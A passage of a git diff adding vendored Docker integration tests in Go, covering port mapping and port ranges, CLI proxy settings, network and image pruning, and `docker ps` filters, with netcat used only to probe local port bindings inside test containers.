"-d", + "-p", "9876:80", + "-p", "9999:80", + "-p", "9877:81", + "-p", "9878:82", + "busybox", "top") + ID = strings.TrimSpace(out) + + out, _ = dockerCmd(c, "port", ID, "80") + + err = assertPortList(c, out, []string{"0.0.0.0:9876", "0.0.0.0:9999"}) + // Port list is not correct + c.Assert(err, checker.IsNil) + + out, _ = dockerCmd(c, "port", ID) + + err = assertPortList(c, out, []string{ + "80/tcp -> 0.0.0.0:9876", + "80/tcp -> 0.0.0.0:9999", + "81/tcp -> 0.0.0.0:9877", + "82/tcp -> 0.0.0.0:9878"}) + // Port list is not correct + c.Assert(err, checker.IsNil) + dockerCmd(c, "rm", "-f", ID) + + testRange := func() { + // host port ranges used + IDs := make([]string, 3) + for i := 0; i < 3; i++ { + out, _ = dockerCmd(c, "run", "-d", + "-p", "9090-9092:80", + "busybox", "top") + IDs[i] = strings.TrimSpace(out) + + out, _ = dockerCmd(c, "port", IDs[i]) + + err = assertPortList(c, out, []string{fmt.Sprintf("80/tcp -> 0.0.0.0:%d", 9090+i)}) + // Port list is not correct + c.Assert(err, checker.IsNil) + } + + // test port range exhaustion + out, _, err = dockerCmdWithError("run", "-d", + "-p", "9090-9092:80", + "busybox", "top") + // Exhausted port range did not return an error + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) + + for i := 0; i < 3; i++ { + dockerCmd(c, "rm", "-f", IDs[i]) + } + } + testRange() + // Verify we ran re-use port ranges after they are no longer in use. + testRange() + + // test invalid port ranges + for _, invalidRange := range []string{"9090-9089:80", "9090-:80", "-9090:80"} { + out, _, err = dockerCmdWithError("run", "-d", + "-p", invalidRange, + "busybox", "top") + // Port range should have returned an error + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) + } + + // test host range:container range spec. + out, _ = dockerCmd(c, "run", "-d", + "-p", "9800-9803:80-83", + "busybox", "top") + ID = strings.TrimSpace(out) + + out, _ = dockerCmd(c, "port", ID) + + err = assertPortList(c, out, []string{ + "80/tcp -> 0.0.0.0:9800", + "81/tcp -> 0.0.0.0:9801", + "82/tcp -> 0.0.0.0:9802", + "83/tcp -> 0.0.0.0:9803"}) + // Port list is not correct + c.Assert(err, checker.IsNil) + dockerCmd(c, "rm", "-f", ID) + + // test mixing protocols in same port range + out, _ = dockerCmd(c, "run", "-d", + "-p", "8000-8080:80", + "-p", "8000-8080:80/udp", + "busybox", "top") + ID = strings.TrimSpace(out) + + out, _ = dockerCmd(c, "port", ID) + + err = assertPortList(c, out, []string{ + "80/tcp -> 0.0.0.0:8000", + "80/udp -> 0.0.0.0:8000"}) + // Port list is not correct + c.Assert(err, checker.IsNil) + dockerCmd(c, "rm", "-f", ID) +} + +func assertPortList(c *check.C, out string, expected []string) error { + lines := strings.Split(strings.Trim(out, "\n "), "\n") + if len(lines) != len(expected) { + return fmt.Errorf("different size lists %s, %d, %d", out, len(lines), len(expected)) + } + sort.Strings(lines) + sort.Strings(expected) + + for i := 0; i < len(expected); i++ { + if lines[i] != expected[i] { + return fmt.Errorf("|" + lines[i] + "!=" + expected[i] + "|") + } + } + + return nil +} + +func stopRemoveContainer(id string, c *check.C) { + dockerCmd(c, "rm", "-f", id) +} + +func (s *DockerSuite) TestUnpublishedPortsInPsOutput(c *check.C) { + testRequires(c, DaemonIsLinux) + // Run busybox with command line expose (equivalent to EXPOSE in image's Dockerfile) for the following ports + port1 := 80 + port2 := 443 + expose1 := fmt.Sprintf("--expose=%d", port1) + expose2 := fmt.Sprintf("--expose=%d", port2) + dockerCmd(c, "run", "-d", expose1, expose2, "busybox", "sleep", "5") + + // Check docker ps o/p for last created container reports the unpublished ports + unpPort1 := fmt.Sprintf("%d/tcp", port1) + unpPort2 := fmt.Sprintf("%d/tcp", port2) + out, _ := dockerCmd(c, "ps", "-n=1") + // Missing unpublished ports in docker ps output + c.Assert(out, checker.Contains, unpPort1) + // Missing unpublished ports in docker ps output + c.Assert(out, checker.Contains, unpPort2) + + // Run the container forcing to publish the exposed ports + dockerCmd(c, "run", "-d", "-P", expose1, expose2, "busybox", "sleep", "5") + + // Check docker ps o/p for last created container reports the exposed ports in the port bindings + expBndRegx1 := regexp.MustCompile(`0.0.0.0:\d\d\d\d\d->` + unpPort1) + expBndRegx2 := regexp.MustCompile(`0.0.0.0:\d\d\d\d\d->` + unpPort2) + out, _ = dockerCmd(c, "ps", "-n=1") + // Cannot find expected port binding port (0.0.0.0:xxxxx->unpPort1) in docker ps output + c.Assert(expBndRegx1.MatchString(out), checker.Equals, true, check.Commentf("out: %s; unpPort1: %s", out, unpPort1)) + // Cannot find expected port binding port (0.0.0.0:xxxxx->unpPort2) in docker ps output + c.Assert(expBndRegx2.MatchString(out), checker.Equals, true, check.Commentf("out: %s; unpPort2: %s", out, unpPort2)) + + // Run the container specifying explicit port bindings for the exposed ports + offset := 10000 + pFlag1 := fmt.Sprintf("%d:%d", offset+port1, port1) + pFlag2 := fmt.Sprintf("%d:%d", offset+port2, port2) + out, _ = dockerCmd(c, "run", "-d", "-p", pFlag1, "-p", pFlag2, expose1, expose2, "busybox", "sleep", "5") + id := strings.TrimSpace(out) + + // Check docker ps o/p for last created container reports the specified port mappings + expBnd1 := fmt.Sprintf("0.0.0.0:%d->%s", offset+port1, unpPort1) + expBnd2 := fmt.Sprintf("0.0.0.0:%d->%s", offset+port2, unpPort2) + out, _ = dockerCmd(c, "ps", "-n=1") + // Cannot find expected port binding (expBnd1) in docker ps output + c.Assert(out, checker.Contains, expBnd1) + // Cannot find expected port binding (expBnd2) in docker ps output + c.Assert(out, checker.Contains, expBnd2) + + // Remove container now otherwise it will interfere with next test + stopRemoveContainer(id, c) + + // Run the container with explicit port bindings and no exposed ports + out, _ = dockerCmd(c, "run", "-d", "-p", pFlag1, "-p", pFlag2, "busybox", "sleep", "5") + id = strings.TrimSpace(out) + + // Check docker ps o/p for last created container reports the specified port mappings + out, _ = dockerCmd(c, "ps", "-n=1") + // Cannot find expected port binding (expBnd1) in docker ps output + c.Assert(out, checker.Contains, expBnd1) + // Cannot find expected port binding (expBnd2) in docker ps output + c.Assert(out, checker.Contains, expBnd2) + // Remove container now otherwise it will interfere with next test + stopRemoveContainer(id, c) + + // Run the container with one unpublished exposed port and one explicit port binding + dockerCmd(c, "run", "-d", expose1, "-p", pFlag2, "busybox", "sleep", "5") + + // Check docker ps o/p for last created container reports the specified unpublished port and port mapping + out, _ = dockerCmd(c, "ps", "-n=1") + // Missing unpublished exposed ports (unpPort1) in docker ps output + c.Assert(out, checker.Contains, unpPort1) + // Missing port binding (expBnd2) in docker ps output + c.Assert(out, checker.Contains, expBnd2) +} + +func (s *DockerSuite) TestPortHostBinding(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + out, _ := dockerCmd(c, "run", "-d", "-p", "9876:80", "busybox", + "nc", "-l", "-p", "80") + firstID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "port", firstID, "80") + + err := assertPortList(c, out, []string{"0.0.0.0:9876"}) + // Port list is not correct + c.Assert(err, checker.IsNil) + + dockerCmd(c, "run", "--net=host", "busybox", + "nc", "localhost", "9876") + + dockerCmd(c, "rm", "-f", firstID) + + out, _, err = dockerCmdWithError("run", "--net=host", "busybox", "nc", "localhost", "9876") + // Port is still bound after the Container is removed + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) +} + +func (s *DockerSuite) TestPortExposeHostBinding(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + out, _ := dockerCmd(c, "run", "-d", "-P", "--expose", "80", "busybox", + "nc", "-l", "-p", "80") + firstID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "port", firstID, "80") + + _, exposedPort, err := net.SplitHostPort(out) + c.Assert(err, checker.IsNil, check.Commentf("out: %s", out)) + + dockerCmd(c, "run", "--net=host", "busybox", + "nc", "localhost", strings.TrimSpace(exposedPort)) + + dockerCmd(c, "rm", "-f", firstID) + + out, _, err = dockerCmdWithError("run", "--net=host", "busybox", + "nc", "localhost", strings.TrimSpace(exposedPort)) + // Port is still bound after the Container is removed + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) +} + +func (s *DockerSuite) TestPortBindingOnSandbox(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + dockerCmd(c, "network", "create", "--internal", "-d", "bridge", "internal-net") + nr := getNetworkResource(c, "internal-net") + c.Assert(nr.Internal, checker.Equals, true) + + dockerCmd(c, "run", "--net", "internal-net", "-d", "--name", "c1", + "-p", "8080:8080", "busybox", "nc", "-l", "-p", "8080") + c.Assert(waitRun("c1"), check.IsNil) + + _, _, err := dockerCmdWithError("run", "--net=host", "busybox", "nc", "localhost", "8080") + c.Assert(err, check.NotNil, + check.Commentf("Port mapping on internal network is expected to fail")) + + // Connect container to another normal bridge network + dockerCmd(c, "network", "create", "-d", "bridge", "foo-net") + dockerCmd(c, "network", "connect", "foo-net", "c1") + + _, _, err = dockerCmdWithError("run", "--net=host", "busybox", "nc", "localhost", "8080") + c.Assert(err, check.IsNil, + check.Commentf("Port mapping on the new network is expected to succeed")) + +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_proxy_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_proxy_test.go new file mode 100644 index 0000000000..1cf569b806 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_proxy_test.go @@ -0,0 +1,53 @@ +package main + +import ( + "net" + "os/exec" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestCLIProxyDisableProxyUnixSock(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, SameHostDaemon) // test is valid when DOCKER_HOST=unix://.. + + cmd := exec.Command(dockerBinary, "info") + cmd.Env = appendBaseEnv(false, "HTTP_PROXY=http://127.0.0.1:9999") + + out, _, err := runCommandWithOutput(cmd) + c.Assert(err, checker.IsNil, check.Commentf("%v", out)) + +} + +// Can't use localhost here since go has a special case to not use proxy if connecting to localhost +// See https://golang.org/pkg/net/http/#ProxyFromEnvironment +func (s *DockerDaemonSuite) TestCLIProxyProxyTCPSock(c *check.C) { + testRequires(c, SameHostDaemon) + // get the IP to use to connect since we can't use localhost + addrs, err := net.InterfaceAddrs() + c.Assert(err, checker.IsNil) + var ip string + for _, addr := range addrs { + sAddr := addr.String() + if !strings.Contains(sAddr, "127.0.0.1") { + addrArr := strings.Split(sAddr, "/") + ip = addrArr[0] + break + } + } + + c.Assert(ip, checker.Not(checker.Equals), "") + + err = s.d.Start("-H", "tcp://"+ip+":2375") + c.Assert(err, checker.IsNil) + cmd := exec.Command(dockerBinary, "info") + cmd.Env = []string{"DOCKER_HOST=tcp://" + ip + ":2375", "HTTP_PROXY=127.0.0.1:9999"} + out, _, err := runCommandWithOutput(cmd) + c.Assert(err, checker.NotNil, check.Commentf("%v", out)) + // Test with no_proxy + cmd.Env = append(cmd.Env, "NO_PROXY="+ip) + out, _, err = runCommandWithOutput(exec.Command(dockerBinary, "info")) + c.Assert(err, checker.IsNil, check.Commentf("%v", out)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_prune_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_prune_unix_test.go new file mode 100644 index 0000000000..dabbc72081 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_prune_unix_test.go @@ -0,0 +1,91 @@ +// +build !windows + +package main + +import ( + "strconv" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func pruneNetworkAndVerify(c *check.C, d *SwarmDaemon, kept, pruned []string) { + _, err := d.Cmd("network", "prune", "--force") + c.Assert(err, checker.IsNil) + out, err := d.Cmd("network", "ls", "--format", "{{.Name}}") + c.Assert(err, checker.IsNil) + for _, s := range kept { + c.Assert(out, checker.Contains, s) + } + for _, s := range pruned { + c.Assert(out, checker.Not(checker.Contains), s) + } +} + +func (s *DockerSwarmSuite) TestPruneNetwork(c *check.C) { + d := s.AddDaemon(c, true, true) + _, err := d.Cmd("network", "create", "n1") // used by container (testprune) + c.Assert(err, checker.IsNil) + _, err = d.Cmd("network", "create", "n2") + c.Assert(err, checker.IsNil) + _, err = d.Cmd("network", "create", "n3", "--driver", "overlay") // used by service (testprunesvc) + c.Assert(err, checker.IsNil) + _, err = d.Cmd("network", "create", "n4", "--driver", "overlay") + c.Assert(err, checker.IsNil) + + cName := "testprune" + _, err = d.Cmd("run", "-d", "--name", cName, "--net", "n1", "busybox", "top") + c.Assert(err, checker.IsNil) + + serviceName := "testprunesvc" + replicas := 1 + out, err := d.Cmd("service", "create", "--name", serviceName, + "--replicas", strconv.Itoa(replicas), + "--network", "n3", + "busybox", "top") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, replicas+1) + + // prune and verify + pruneNetworkAndVerify(c, d, []string{"n1", "n3"}, []string{"n2", "n4"}) + + // remove containers, then prune and verify again + _, err = d.Cmd("rm", "-f", cName) + c.Assert(err, checker.IsNil) + _, err = d.Cmd("service", "rm", serviceName) + c.Assert(err, checker.IsNil) + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 0) + pruneNetworkAndVerify(c, d, []string{}, []string{"n1", "n3"}) +} + +func (s *DockerDaemonSuite) TestPruneImageDangling(c *check.C) { + c.Assert(s.d.StartWithBusybox(), checker.IsNil) + + out, _, err := s.d.buildImageWithOut("test", + `FROM busybox + LABEL foo=bar`, true, "-q") + c.Assert(err, checker.IsNil) + id := strings.TrimSpace(out) + + out, err = s.d.Cmd("images", "-q", "--no-trunc") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Contains, id) + + out, err = s.d.Cmd("image", "prune", "--force") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id) + + out, err = s.d.Cmd("images", "-q", "--no-trunc") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Contains, id) + + out, err = s.d.Cmd("image", "prune", "--force", "--all") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Contains, id) + + out, err = s.d.Cmd("images", "-q", "--no-trunc") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), id) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_ps_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_ps_test.go new file mode 100644 index 0000000000..19ede90d5a --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_ps_test.go @@ -0,0 +1,952 @@ +package main + +import ( + "fmt" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "sort" + "strconv" + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/pkg/stringid" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestPsListContainersBase(c *check.C) { + out, _ := runSleepingContainer(c, "-d") + firstID := strings.TrimSpace(out) + + out, _ = runSleepingContainer(c, "-d") + secondID := strings.TrimSpace(out) + + // not long running + out, _ = dockerCmd(c, "run", "-d", "busybox", "true") + thirdID := strings.TrimSpace(out) + + out, _ = runSleepingContainer(c, "-d") + fourthID := strings.TrimSpace(out) + + // make sure the second is running + c.Assert(waitRun(secondID), checker.IsNil) + + // make sure third one is not running + dockerCmd(c, "wait", thirdID) + + // make sure the forth is running + c.Assert(waitRun(fourthID), checker.IsNil) + + // all + out, _ = dockerCmd(c, "ps", "-a") + c.Assert(assertContainerList(out, []string{fourthID, thirdID, secondID, firstID}), checker.Equals, true, check.Commentf("ALL: Container list is not in the correct order: \n%s", out)) + + // running + out, _ = dockerCmd(c, "ps") + c.Assert(assertContainerList(out, []string{fourthID, secondID, firstID}), checker.Equals, true, check.Commentf("RUNNING: Container list is not in the correct order: \n%s", out)) + + // limit + out, _ = dockerCmd(c, "ps", "-n=2", "-a") + expected := []string{fourthID, thirdID} + c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("LIMIT & ALL: Container list is not in the correct order: \n%s", out)) + + out, _ = dockerCmd(c, "ps", "-n=2") + c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("LIMIT: Container list is not in the correct order: \n%s", out)) + + // filter since + out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-a") + expected = []string{fourthID, thirdID, secondID} + c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter & ALL: Container list is not in the correct order: \n%s", out)) + + out, _ = dockerCmd(c, "ps", "-f", "since="+firstID) + expected = []string{fourthID, secondID} + c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter: Container list is not in the correct order: \n%s", out)) + + out, _ = dockerCmd(c, "ps", "-f", "since="+thirdID) + expected = []string{fourthID} + c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter: Container list is not in the correct order: \n%s", out)) + + // filter before + out, _ = dockerCmd(c, "ps", "-f", "before="+fourthID, "-a") + expected = []string{thirdID, secondID, firstID} + c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter & ALL: Container list is not in the correct order: \n%s", out)) + + out, _ = dockerCmd(c, "ps", "-f", "before="+fourthID) + expected = []string{secondID, firstID} + c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter: Container list is not in the correct order: \n%s", out)) + + out, _ = dockerCmd(c, "ps", "-f", "before="+thirdID) + expected = []string{secondID, firstID} + c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter: Container list is not in the correct order: \n%s", out)) + + // filter since & before + out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-f", "before="+fourthID, "-a") + expected = []string{thirdID, secondID} + c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter & ALL: Container list is not in the correct order: \n%s", out)) + + out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-f", "before="+fourthID) + expected = []string{secondID} + c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter: Container list is not in the correct order: \n%s", out)) + + // filter since & limit + out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-n=2", "-a") + expected = []string{fourthID, thirdID} + + c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, LIMIT & ALL: Container list is not in the correct order: \n%s", out)) + + out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-n=2") + c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, LIMIT: Container list is not in the correct order: \n%s", out)) + + // filter before & limit + out, _ = dockerCmd(c, "ps", "-f", "before="+fourthID, "-n=1", "-a") + expected = []string{thirdID} + c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter, LIMIT & ALL: Container list is not in the correct order: \n%s", out)) + + out, _ = dockerCmd(c, "ps", "-f", "before="+fourthID, "-n=1") + c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter, LIMIT: Container list is not in the correct order: \n%s", out)) + + // filter since & filter before & limit + out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-f", "before="+fourthID, "-n=1", "-a") + expected = []string{thirdID} + c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter, LIMIT & ALL: Container list is not in the correct order: \n%s", out)) + + out, _ = dockerCmd(c, "ps", "-f", "since="+firstID, "-f", "before="+fourthID, "-n=1") + c.Assert(assertContainerList(out, expected), checker.Equals, true, check.Commentf("SINCE filter, BEFORE filter, LIMIT: Container list is not in the correct order: \n%s", out)) + +} + +func assertContainerList(out string, expected []string) bool { + lines := strings.Split(strings.Trim(out, "\n "), "\n") + + if len(lines)-1 != len(expected) { + return false + } + + containerIDIndex := strings.Index(lines[0], "CONTAINER ID") + for i := 0; i < len(expected); i++ { + foundID := lines[i+1][containerIDIndex : containerIDIndex+12] + if foundID != expected[i][:12] { + return false + } + } + + return true +} + +// FIXME(vdemeester) Move this into a unit test in daemon package +func (s *DockerSuite) TestPsListContainersInvalidFilterName(c *check.C) { + out, _, err := dockerCmdWithError("ps", "-f", "invalidFilter=test") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "Invalid filter") +} + +func (s *DockerSuite) TestPsListContainersSize(c *check.C) { + // Problematic on Windows as it doesn't report the size correctly @swernli + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "-d", "busybox") + + baseOut, _ := dockerCmd(c, "ps", "-s", "-n=1") + baseLines := strings.Split(strings.Trim(baseOut, "\n "), "\n") + baseSizeIndex := strings.Index(baseLines[0], "SIZE") + baseFoundsize := baseLines[1][baseSizeIndex:] + baseBytes, err := strconv.Atoi(strings.Split(baseFoundsize, " ")[0]) + c.Assert(err, checker.IsNil) + + name := "test_size" + dockerCmd(c, "run", "--name", name, "busybox", "sh", "-c", "echo 1 > test") + id, err := getIDByName(name) + c.Assert(err, checker.IsNil) + + runCmd := exec.Command(dockerBinary, "ps", "-s", "-n=1") + var out string + + wait := make(chan struct{}) + go func() { + out, _, err = runCommandWithOutput(runCmd) + close(wait) + }() + select { + case <-wait: + case <-time.After(3 * time.Second): + c.Fatalf("Calling \"docker ps -s\" timed out!") + } + c.Assert(err, checker.IsNil) + lines := strings.Split(strings.Trim(out, "\n "), "\n") + c.Assert(lines, checker.HasLen, 2, check.Commentf("Expected 2 lines for 'ps -s -n=1' output, got %d", len(lines))) + sizeIndex := strings.Index(lines[0], "SIZE") + idIndex := strings.Index(lines[0], "CONTAINER ID") + foundID := lines[1][idIndex : idIndex+12] + c.Assert(foundID, checker.Equals, id[:12], check.Commentf("Expected id %s, got %s", id[:12], foundID)) + expectedSize := fmt.Sprintf("%d B", (2 + baseBytes)) + foundSize := lines[1][sizeIndex:] + c.Assert(foundSize, checker.Contains, expectedSize, check.Commentf("Expected size %q, got %q", expectedSize, foundSize)) +} + +func (s *DockerSuite) TestPsListContainersFilterStatus(c *check.C) { + // start exited container + out, _ := dockerCmd(c, "run", "-d", "busybox") + firstID := strings.TrimSpace(out) + + // make sure the exited container is not running + dockerCmd(c, "wait", firstID) + + // start running container + out, _ = dockerCmd(c, "run", "-itd", "busybox") + secondID := strings.TrimSpace(out) + + // filter containers by exited + out, _ = dockerCmd(c, "ps", "--no-trunc", "-q", "--filter=status=exited") + containerOut := strings.TrimSpace(out) + c.Assert(containerOut, checker.Equals, firstID) + + out, _ = dockerCmd(c, "ps", "-a", "--no-trunc", "-q", "--filter=status=running") + containerOut = strings.TrimSpace(out) + c.Assert(containerOut, checker.Equals, secondID) + + result := dockerCmdWithTimeout(time.Second*60, "ps", "-a", "-q", "--filter=status=rubbish") + c.Assert(result, icmd.Matches, icmd.Expected{ + ExitCode: 1, + Err: "Unrecognised filter value for status", + }) + + // Windows doesn't support pausing of containers + if daemonPlatform != "windows" { + // pause running container + out, _ = dockerCmd(c, "run", "-itd", "busybox") + pausedID := strings.TrimSpace(out) + dockerCmd(c, "pause", pausedID) + // make sure the container is unpaused to let the daemon stop it properly + defer func() { dockerCmd(c, "unpause", pausedID) }() + + out, _ = dockerCmd(c, "ps", "--no-trunc", "-q", "--filter=status=paused") + containerOut = strings.TrimSpace(out) + c.Assert(containerOut, checker.Equals, pausedID) + } +} + +func (s *DockerSuite) TestPsListContainersFilterHealth(c *check.C) { + // Test legacy no health check + out, _ := runSleepingContainer(c, "--name=none_legacy") + containerID := strings.TrimSpace(out) + + waitForContainer(containerID) + + out, _ = dockerCmd(c, "ps", "-q", "-l", "--no-trunc", "--filter=health=none") + containerOut := strings.TrimSpace(out) + c.Assert(containerOut, checker.Equals, containerID, check.Commentf("Expected id %s, got %s for legacy none filter, output: %q", containerID, containerOut, out)) + + // Test no health check specified explicitly + out, _ = runSleepingContainer(c, "--name=none", "--no-healthcheck") + containerID = strings.TrimSpace(out) + + waitForContainer(containerID) + + out, _ = dockerCmd(c, "ps", "-q", "-l", "--no-trunc", "--filter=health=none") + containerOut = strings.TrimSpace(out) + c.Assert(containerOut, checker.Equals, containerID, check.Commentf("Expected id %s, got %s for none filter, output: %q", containerID, containerOut, out)) + + // Test failing health check + out, _ = runSleepingContainer(c, "--name=failing_container", "--health-cmd=exit 1", "--health-interval=1s") + containerID = strings.TrimSpace(out) + + waitForHealthStatus(c, "failing_container", "starting", "unhealthy") + + out, _ = dockerCmd(c, "ps", "-q", "--no-trunc", "--filter=health=unhealthy") + containerOut = strings.TrimSpace(out) + c.Assert(containerOut, checker.Equals, containerID, check.Commentf("Expected containerID %s, got %s for unhealthy filter, output: %q", containerID, containerOut, out)) + + // Check passing healthcheck + out, _ = runSleepingContainer(c, "--name=passing_container", "--health-cmd=exit 0", "--health-interval=1s") + containerID = strings.TrimSpace(out) + + waitForHealthStatus(c, "passing_container", "starting", "healthy") + + out, _ = dockerCmd(c, "ps", "-q", "--no-trunc", "--filter=health=healthy") + containerOut = strings.TrimSpace(out) + c.Assert(containerOut, checker.Equals, containerID, check.Commentf("Expected containerID %s, got %s for healthy filter, output: %q", containerID, containerOut, out)) +} + +func (s *DockerSuite) TestPsListContainersFilterID(c *check.C) { + // start container + out, _ := dockerCmd(c, "run", "-d", "busybox") + firstID := strings.TrimSpace(out) + + // start another container + runSleepingContainer(c) + + // filter containers by id + out, _ = dockerCmd(c, "ps", "-a", "-q", "--filter=id="+firstID) + containerOut := strings.TrimSpace(out) + c.Assert(containerOut, checker.Equals, firstID[:12], check.Commentf("Expected id %s, got %s for exited filter, output: %q", firstID[:12], containerOut, out)) +} + +func (s *DockerSuite) TestPsListContainersFilterName(c *check.C) { + // start container + dockerCmd(c, "run", "--name=a_name_to_match", "busybox") + id, err := getIDByName("a_name_to_match") + c.Assert(err, check.IsNil) + + // start another container + runSleepingContainer(c, "--name=b_name_to_match") + + // filter containers by name + out, _ := dockerCmd(c, "ps", "-a", "-q", "--filter=name=a_name_to_match") + containerOut := strings.TrimSpace(out) + c.Assert(containerOut, checker.Equals, id[:12], check.Commentf("Expected id %s, got %s for exited filter, output: %q", id[:12], containerOut, out)) +} + +// Test for the ancestor filter for ps. +// There is also the same test but with image:tag@digest in docker_cli_by_digest_test.go +// +// What the test setups : +// - Create 2 image based on busybox using the same repository but different tags +// - Create an image based on the previous image (images_ps_filter_test2) +// - Run containers for each of those image (busybox, images_ps_filter_test1, images_ps_filter_test2) +// - Filter them out :P +func (s *DockerSuite) TestPsListContainersFilterAncestorImage(c *check.C) { + // Build images + imageName1 := "images_ps_filter_test1" + imageID1, err := buildImage(imageName1, + `FROM busybox + LABEL match me 1`, true) + c.Assert(err, checker.IsNil) + + imageName1Tagged := "images_ps_filter_test1:tag" + imageID1Tagged, err := buildImage(imageName1Tagged, + `FROM busybox + LABEL match me 1 tagged`, true) + c.Assert(err, checker.IsNil) + + imageName2 := "images_ps_filter_test2" + imageID2, err := buildImage(imageName2, + fmt.Sprintf(`FROM %s + LABEL match me 2`, imageName1), true) + c.Assert(err, checker.IsNil) + + // start containers + dockerCmd(c, "run", "--name=first", "busybox", "echo", "hello") + firstID, err := getIDByName("first") + c.Assert(err, check.IsNil) + + // start another container + dockerCmd(c, "run", "--name=second", "busybox", "echo", "hello") + secondID, err := getIDByName("second") + c.Assert(err, check.IsNil) + + // start third container + dockerCmd(c, "run", "--name=third", imageName1, "echo", "hello") + thirdID, err := getIDByName("third") + c.Assert(err, check.IsNil) + + // start fourth container + dockerCmd(c, "run", "--name=fourth", imageName1Tagged, "echo", "hello") + fourthID, err := getIDByName("fourth") + c.Assert(err, check.IsNil) + + // start fifth container + dockerCmd(c, "run", "--name=fifth", imageName2, "echo", "hello") + fifthID, err := getIDByName("fifth") + c.Assert(err, check.IsNil) + + var filterTestSuite = []struct { + filterName string + expectedIDs []string + }{ + // non existent stuff + {"nonexistent", []string{}}, + {"nonexistent:tag", []string{}}, + // image + {"busybox", []string{firstID, secondID, thirdID, fourthID, fifthID}}, + {imageName1, []string{thirdID, fifthID}}, + {imageName2, []string{fifthID}}, + // image:tag + {fmt.Sprintf("%s:latest", imageName1), []string{thirdID, fifthID}}, + {imageName1Tagged, []string{fourthID}}, + // short-id + {stringid.TruncateID(imageID1), []string{thirdID, fifthID}}, + {stringid.TruncateID(imageID2), []string{fifthID}}, + // full-id + {imageID1, []string{thirdID, fifthID}}, + {imageID1Tagged, []string{fourthID}}, + {imageID2, []string{fifthID}}, + } + + var out string + for _, filter := range filterTestSuite { + out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=ancestor="+filter.filterName) + checkPsAncestorFilterOutput(c, out, filter.filterName, filter.expectedIDs) + } + + // Multiple ancestor filter + out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=ancestor="+imageName2, "--filter=ancestor="+imageName1Tagged) + checkPsAncestorFilterOutput(c, out, imageName2+","+imageName1Tagged, []string{fourthID, fifthID}) +} + +func checkPsAncestorFilterOutput(c *check.C, out string, filterName string, expectedIDs []string) { + actualIDs := []string{} + if out != "" { + actualIDs = strings.Split(out[:len(out)-1], "\n") + } + sort.Strings(actualIDs) + sort.Strings(expectedIDs) + + c.Assert(actualIDs, checker.HasLen, len(expectedIDs), check.Commentf("Expected filtered container(s) for %s ancestor filter to be %v:%v, got %v:%v", filterName, len(expectedIDs), expectedIDs, len(actualIDs), actualIDs)) + if len(expectedIDs) > 0 { + same := true + for i := range expectedIDs { + if actualIDs[i] != expectedIDs[i] { + c.Logf("%s, %s", actualIDs[i], expectedIDs[i]) + same = false + break + } + } + c.Assert(same, 